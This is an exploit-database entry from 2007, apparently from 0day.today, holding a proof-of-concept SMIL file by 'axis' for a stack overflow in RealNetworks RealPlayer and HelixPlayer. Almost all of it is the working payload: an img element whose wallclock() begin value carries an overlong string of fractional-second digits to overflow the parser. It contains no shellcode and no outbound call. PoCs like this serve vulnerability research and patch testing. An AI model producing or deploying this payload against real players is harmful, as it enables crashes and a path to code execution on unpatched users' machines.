id: 6413
date: 06/26/2007
title: RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC
author: axis
cves: 

=====================================================================
RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC
=====================================================================




<!--
author:	axis
site:   http://www.ph4nt0m.org
-->

<smil xmlns="http://www.w3.org/2000/SMIL20/CR/Language">
  <body>
    <par>
      <img src="./1.jpg" begin="wallclock(12:00:00.999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999+9)" dur="5s"/>
    </par>
  </body>
</smil>



#  0day.today [2023-03-25]  #